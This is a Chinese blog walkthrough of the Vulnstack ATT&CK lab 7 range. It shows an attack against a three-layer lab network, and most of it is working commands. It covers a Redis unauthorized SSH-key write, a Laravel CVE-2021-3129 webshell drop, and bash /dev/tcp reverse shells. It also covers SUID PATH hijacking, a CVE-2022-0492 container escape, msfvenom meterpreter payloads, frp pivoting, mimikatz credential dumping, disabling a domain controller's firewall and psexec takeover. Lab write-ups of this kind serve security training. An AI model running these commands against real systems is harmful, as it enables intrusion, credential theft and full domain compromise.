ATT&CK实战:红日靶场七

已于 2023-06-19 14:47:28 修改
阅读量597 收藏 2
点赞数 1
分类专栏: ATT&CT靶场 文章标签: linux 网络 服务器 windows 网络安全 安全
于 2023-06-19 14:43:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuzixuan0207/article/details/131287686
版权

信息收集

使用arp进行主机发现

sudo arp-scan -l

nmap扫描主机192.168.206.20

sudo nmap -n -v -sS --min-rate 10000 -p- -Pn 192.168.206.20

扫描结果


Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-24 14:38 CST
Initiating ARP Ping Scan at 14:38
Scanning 192.168.206.20 [1 port]
Completed ARP Ping Scan at 14:38, 0.14s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:38
Scanning 192.168.206.20 [65535 ports]
Discovered open port 22/tcp on 192.168.206.20
Discovered open port 80/tcp on 192.168.206.20
Discovered open port 81/tcp on 192.168.206.20
Discovered open port 6379/tcp on 192.168.206.20
Completed SYN Stealth Scan at 14:38, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.206.20
Host is up (0.00018s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
81/tcp   open  hosts2-ns
6379/tcp open  redis
MAC Address: 00:0C:29:24:CB:F0 (VMware)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.51 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

访问80 和 81端口

Web渗透

Redis未授权访问

redis-cli -h 192.168.149.20

尝试写入公钥进行登录

生成公钥文件

ssh-keygen -t rsa

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTxA54DkKtGgrD+PCEjNE7Z1m7BG5UZV02Lv2yaqf4oxEsY6SZLsLvFi7vtonWbBwjs/wzgsiUE07B+M0MUGBfikPikD8BVgd7/pDE5eYHtnoFB5TJSeRC7cfH8TDnZ9eFbxRB5iosKL8wOdX5fLFWhDmotKC47ZLnP5QacraMPc+AHC7N//swO9cs7WOXyFNATLUwcZePwnDja0DlWs1uxRBp9OHJcmUwG9Tb+v/RXBjx1Qo7ovwa7izI8cGM+YdSKrkBXMneP92cENo5oaJxnlXh5PhpfnAAIQ2Zzqz9nadLj8HrCCjnfhIOQBbvo5AjNy1+IhfWCi14AGijq3KGYIjF4MdIuFGF2axTxLra9XMxpiM+DakjHjYPkNPq9OYeS9IgSl8/spPx2B6hmsVkoBah51eJW9+ixytSwxH6QnNTs6eATaAc2VoYUppTC0XwUZos4WrM8LJ+uHN1yePnbts573yIM04u6CW0zSKhaIJjpCY+aHmD43BsUr8dyss= jojo@kali

写入公钥

config get dir

config get dbfilename

config set dir /root/.ssh/

config set dbfilename authorized_keys

set xz "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDTxA54DkKtGgrD+PCEjNE7Z1m7BG5UZV02Lv2yaqf4oxEsY6SZLsLvFi7vtonWbBwjs/wzgsiUE07B+M0MUGBfikPikD8BVgd7/pDE5eYHtnoFB5TJSeRC7cfH8TDnZ9eFbxRB5iosKL8wOdX5fLFWhDmotKC47ZLnP5QacraMPc+AHC7N//swO9cs7WOXyFNATLUwcZePwnDja0DlWs1uxRBp9OHJcmUwG9Tb+v/RXBjx1Qo7ovwa7izI8cGM+YdSKrkBXMneP92cENo5oaJxnlXh5PhpfnAAIQ2Zzqz9nadLj8HrCCjnfhIOQBbvo5AjNy1+IhfWCi14AGijq3KGYIjF4MdIuFGF2axTxLra9XMxpiM+DakjHjYPkNPq9OYeS9IgSl8/spPx2B6hmsVkoBah51eJW9+ixytSwxH6QnNTs6eATaAc2VoYUppTC0XwUZos4WrM8LJ+uHN1yePnbts573yIM04u6CW0zSKhaIJjpCY+aHmD43BsUr8dyss= jojo@kali \n\n\n"

save

指定公钥 登录主机

ssh -i ~/.ssh/id_rsa root@192.168.149.20

收集本机信息

ip:192.168.149.20 192.168.52.10
cat /etc/nginx/conf.d/81.conf

发现是将192.168.52.20:8000端口 的服务反向代理到本机的81端口 也就是说本机81端口上的服务 是运行在192.168.52.20这台机器上的

CVE-2021-3129

发现laravel 版本为v8.29.0 存在 CVE-2021-3129 使用exp验证 修改脚本 写入php一句话

GitHub - zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)

system('echo PD9waHAgZXZhbCgiJF9QT1NUW2NtZF0iKTs/Pg==|base64 -d >/var/www/html/shell.php ');

运行 后访问shell.php

python3 exp.py http://192.168.149.20:81/

可以访问到shell.php

使用蚁剑进行连接

发现是docker 且 不出网 需要将shell反弹到192.168.52.10(ubuntu1)进行利用

cat /proc/1/cgroup

由于是www-data用户 权限低 逃逸需要高权限 这里先进行提权再进行逃逸

find / -type f -perm -04000 -ls 2>/dev/null列出设置了 SUID 或 SGID 位的文件

发现/home/jobs/shell demo.c

#include<unistd.h>
void main()
{ setuid(0);
  setgid(0);
  system("ps"); // 执行ps
}

反弹shell到ubuntu1

 bash -c 'bash -i >& /dev/tcp/192.168.52.10/6677 0>&1'

修改ps命令指向/tmp/ps ps执行后为bash

echo '/bin/bash' > /tmp/ps
chmod 777 /tmp/ps
export PATH=/tmp:$PATH
echo $PATH

执行 shell文件 得到root权限

上传脚本检测docker逃逸漏洞 发现存在四个漏洞

git clone https://github.com/teamssix/container-escape-check.git

./container-escape-check.sh

CVE-2022-0492 容器逃逸

容器内 root权限 执行

unshare -UrmC bash
mkdir /tmp/testcgroup
mount -t cgroup -o memory cgroup /tmp/testcgroup
d=`dirname $(ls -x /tmp/testcgroup/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/192.168.52.10/7788 0>&1' > /exp.sh; chmod 777 /exp.sh
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$t/exp.sh" > $d/release_agent
sh -c "echo 0 >$d/w/cgroup.procs"

执行后 shell已经反弹回来

内网渗透

至此已经拿下两台linux主机

ubuntu1 和 ubuntu2 整理一下

ubuntu1 
    ip:192.168.149.20 192.168.52.10

ubuntu2 
    ip:192.168.52.20 192.168.93.10

ubuntu1 上线 msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.149.49 LPORT=3344 -f elf -o reverse.elf

msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost 192.168.149.49; set lport 3344; exploit"

写入路由
run post/multi/manage/autoroute

ubuntu2 上线 msf

msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=192.168.149.49 LPORT=4455 -f elf -o bind.elf

msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/bind_tcp; set lhost 192.168.149.49; set lport 4455; exploit"

上传frp到ubuntu2 开启socks代理

上传fscan到ubuntu2 扫描 192.168.52.0/24

start infoscan
192.168.52.20:22 open
192.168.52.10:22 open
192.168.52.10:80 open
192.168.52.10:81 open
192.168.52.20:8000 open
192.168.52.30:8080 open
[*] alive ports len is: 6
start vulscan
[*] WebTitle: http://192.168.52.30:8080 code:200 len:10065  title:通达OA网络智能办公系统
[+] InfoScan:http://192.168.52.30:8080 [通达OA] 
[*] WebTitle: http://192.168.52.10      code:404 len:548    title:404 Not Found
[*] WebTitle: http://192.168.52.10:81   code:200 len:17474  title:Laravel
[*] WebTitle: http://192.168.52.20:8000 code:200 len:17474  title:Laravel
[+] InfoScan:http://192.168.52.10:81   [Laravel] 
[+] InfoScan:http://192.168.52.20:8000 [Laravel] 
[+] http://192.168.52.30:8080 tongda-user-session-disclosure 
[+] http://192.168.52.10:81 poc-yaml-laravel-cve-2021-3129 
[+] http://192.168.52.20:8000 poc-yaml-laravel-cve-2021-3129

发现通达OA有漏洞

蚁剑设置代理连接 为system权限

上传fscan扫描 192.168.93.0/24

192.168.93.20:445 open
192.168.93.40:139 open
192.168.93.20:1080 open
192.168.93.30:88 open
192.168.93.20:8080 open
192.168.93.40:445 open
192.168.93.30:139 open
192.168.93.30:445 open
192.168.93.20:139 open
192.168.93.40:135 open
192.168.93.30:135 open
192.168.93.20:135 open
192.168.93.10:22 open
[+] 192.168.93.30	MS17-010	(Windows Server 2012 R2 Datacenter 9600)
[*] WebTitle: http://192.168.93.20:8080 code:200 len:10065  title:通达OA网络智能办公系统
[*] NetBios: 192.168.93.20   PC1.whoamianony.org                 Windows 7 Professional 7601 Service Pack 1 
[+] 192.168.93.20	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[*] NetInfo:
[*]192.168.93.30
   [->]DC
   [->]192.168.93.30
[+] InfoScan:http://192.168.93.20:8080 [通达OA] 
[*] NetBios: 192.168.93.30   [+]DC DC.whoamianony.org            Windows Server 2012 R2 Datacenter 9600 
[+] 192.168.93.40	MS17-010	(Windows 7 Professional 7601 Service Pack 1)
[+] http://192.168.93.20:8080 tongda-user-session-disclosure

跳板机信息收集

抓密码

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > res.txt
域控:192.168.93.30 DC.whoamianony.org 
域:whoamianony.org
存活主机:
    192.168.93.10 ubuntu2
    192.168.93.20 Windows 7 Professional 7601 Service Pack 1 ms17-010 跳板机
    192.168.93.30 DC Windows Server 2012 R2 Datacenter 9600 
    192.168.93.40 Windows 7 Professional 7601 Service Pack 1 ms17-010

账号:Administrator 密码:Whoami2021
    bunny  Bunny2021

因为是双层网络 需要搭建二层代理

 # frps.ini
 [common]  
 bind_port = 7000   
#frpc.ini
[common]
server_addr = 192.168.1.102
server_port = 7000

[socks5_forward]
type = tcp
local_ip = 192.168.52.10   
local_port = 10808       
remote_port = 6005   
#frps.ini
[common]
Bind_addr = 192.168.52.10
bind_port = 7000
#frpc.ini
[common]
server_addr = 192.168.52.10
server_port = 7000

[plugin_socks]
type = tcp
remote_port = 10808
plugin = socks5

代理搭建好后使用proxychains代理msf

拿下192.168.93.40 (ms17_010)

拿下192.168.93.20 (ms17_010)

使用sc 关闭dc防火墙

net use \\192.168.93.30\ipc$ "Whoami2021" /user:"Administrator"
sc \\192.168.93.30 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.93.30 start unablefirewall

使用psexec上线 DC192.168.93.30

use exploit/windows/smb/psexec
set payload windows/x64/shell_bind_tcp
set smbuser administrator
set smbpass Whoami2021
set rhost 192.168.93.30
run

至此所有五台靶机的shell都已拿到,渗透完毕。

ssp@
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
通达OA漏洞分析合集
不忘初心,护天下安全!
06-21 4119
通达OA是一套使用比较广泛的办公系统。随着国家护网的开展,通达OA成为渗透人员优先尝试的目标,暴露出了大量漏洞,以下进行介绍。判断通达版本爆破用户、邮箱GET 参数可获取username、email获得计算机名 通达OA v2014 app="TDXK-通达OA" app="TDXK-通达OA" && (title="2013" || title="2015")通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏
TongDa_Scan:通达OA在线用户登录poc
03-13
进攻简述 通达OA v11.7中存在某接口查询在线用户,当用户在线时会返回PHPSESSION实现可登录后台系统 影响版本 通达OA <v11.7 进攻利用 检测当前用户是否存在线 http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 不在线 不在线显示RELOGIN 在线 在线页面空白,但已拿到SESSION 设置Cookie可直接登录后台 http://127.0.0.1/general/index.php 工具利用 # 指定 URL python3 .\TongDa_Scan.py -u 127.0.0.1 # 指定 uid 进行扫描 python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1 # 批量扫描,默认扫描UID为1 python3 .\TongDa_Scan.py -f .
靶场系列】ATT&CK队评估7
weixin_45632448的博客
10-16 2059
cd到/home/jobs目录下,运行一下这个文件,可以看到shell文件执行了ps命令,并且未使用绝对路径,所以我们可以尝试更改$PATH来执行我们的恶意程序,从而获得目标主机的高权限shell。有Ubuntu这个用户,就可以把我们自己生成的SSH密钥写入到/test/home/ubuntu/.ssh目录中的authorized_keys文件中,写入成功之后就可以使用该密钥进行登陆该机器。这样,第二层网络中的所有主机皆可以上网,但是位于第三层网络中的所有主机都不与外网相连通,不能上网。
靶场(七)vulnstack7
最新发布
qq_44005305的博客
03-05 1066
ops_request_misc=&request_id=&biz_id=102&utm_term=%E7%BA%A2%E6%97%A5%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%E9%9D%B6%E5%9C%BA7&utm_medium=distribute.pc_search_result.none-接下来将我们生成的ssh密钥写入/hi/home/ubuntu/.ssh目录的authorzed_keys文件中,写入后我们就可以使用密钥登录改机器。
安全att&ck靶场7 内网靶场 WP
trytowritecode的博客
04-11 6959
记一次中型靶场getshell全过程,难度适中,很有意思 这里用kali来模拟外网攻击机,其实用自己服务器也完全ok 个人认为,此方法比官方wp要好懂一些 首先是靶场地址 靶场 先看拓扑图因为环境要提前配置,这里的192.168.1.0/24的这个网段根据自己的虚拟机环境来改不一定说一定要和官方拓扑一模一样,就像我自己就是192.168.16.0/24 看下图 然后开始配置环境,网卡这里官方已经处理的差不多了,大概是能测试ping通就行 然后启动服务这里全按官方说明来配置 这里注意了很重要不然你后面打靶
安全ATT&CK靶机实战系列之vulnstack7
黑白的博客
04-30 8449
声明 好好学习,天天向上 环境配置 下载地址,直接进去用百度云,没有会员也下的非常快 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 边下载着,可以开始vmware的网络配置 这次和前面不太一样了 有三个网段,所以需要我们把网络这块拿捏的死死的 DMZ区 桥接模式(这个IP段不固定,我是31段的) IP段为192.168.31.1/24 第二层网络环境 NAT模式 IP段为192.168.52.1/24 第三层网络环境 仅主机模块 IP段为192.1
靶场七教程,不看后悔!
weixin_45885440的博客
10-11 1107
主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习
ATT&CK靶场系列(七)
qq_1873822的博客
12-04 6710
一、环境配置 vlunstack是安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ DMZ区IP段为192.168.1.1/24 第二层网络环境IP段为192.168.52.1/24 第三层网络环境IP段为192.168.93.1/24 按着上面的图片把相关的ip段给配置就行 DMZ区域: 给Ubuntu (Web 1) 配置了两个网卡,一个可以对外提供服务;一个连接第二层网络。 第二层网络区域: 给U
七vulnstack7全操作
weixin_62334252的博客
06-22 6605
http://vulnstack.qiyuanxuetang.net/vuln/detail/9/整个靶场的网络环境分为三层。从最初的信息收集、外网初探、攻入内网、搭建代理,横向移动,最终拿下域控。 域用户账户和密码如下: Administrator:Whoami2021 whoami:Whoami2021 bunny:Bunny2021 moretz:Moretz2021Ubuntu 1: web:web2021Ubuntu 2: ubuntu
通达OA前台伪造管理登陆cookie生成tongda.py
05-07
通达OA 前台伪造管理员登陆漏洞的cookie生成脚本,可以用以生成PHPsessionid,然后替换cookie,从而登陆通达OA后台。
ATT&CK入门:检测和分析1
08-04
与本系列的第一篇文章一样,这篇文章将根据您的团队的复杂程度以及您可以访问的资源分为几个级别:对于刚开始可能没有很多资源的人来说,1级对于那些中级球队开始成熟的人
ATT&CK中文手册.zip
11-24
一、Initial Access(入口点) 二、Execution(命令执行) 三、Persistence(持久化) 四、Privilege Escalation(权限提升) 五、Defense Evasion(绕过防御) 六、Credential Access(获取凭证) 七、Discovery(基础信息收集) ...
tram:威胁报告ATT&CK:trade_mark:映射(TRAM)是一种工具,可帮助分析师将完成的报告映射到ATT&CK
05-12
TRAM v0.5 威胁报告ATT&CK:registered:映射(TRAM)是一种工具来辅助分析师映射完成报告ATT&CK。 TRAM目前处于测试阶段,并且正在积极开发中。要求 (3.7+) Google Chrome是我们唯一受支持/经过测试的浏览器安装...
ATT&CK手册(修改版)
09-16
ATT&CK手册(修改版)
【网络安全】带你打穿三层内网-靶场
Yb528970805的博客
09-14 303
注意我们已经将kali的6667和vps的6667关联,所以其实web1的6667最终流量会到达kali,注意监听器需要设置为web1的内网ip,通过http连接。通过win7(pc1)横向渗透,抓取hash和明文可以抓取到域内用户bunny的密码值,上传fscan对93c段进行扫描。反弹shell,这里需要将kali的监听端口转发到web1上,然后让web2来连接web1。拿到web2的system权限,由于是windows,,所以上线cs操作。上线为www权限,还在docker中,考虑提权再逃逸。
记通达OA前台任意用户登录漏洞复现
ergou11的博客
04-23 545
记通达OA前台任意用户登录漏洞复现
ATT\\\\&CK队评估实战靶场
08-16
ATT&CK队评估实战靶场四是一个实战训练场景,其中使用了phpmyadmin来利用数据库志写入马来获取会话。具体的方法和之前的靶场一类似,你可以去查看相关链接了解更多细节。在攻击机要访问52网段的资源时,可以使用session 4作为下一跳进行路由设置。可以通过routeprint命令查看路由表,并使用routeadd命令添加相应的路由。此外,可以通过将SSH公钥添加到/home/ubuntu/.ssh/authorized_keys文件来实现免密登录到目标机器。具体命令是将SSH公钥追加到该文件中。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ATT&CK队评估(靶场四)](https://blog.csdn.net/weixin_45682839/article/details/124485070)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* [ATT&CK队评估实战靶场-1(全网最细)](https://blog.csdn.net/qq_40638006/article/details/122033546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值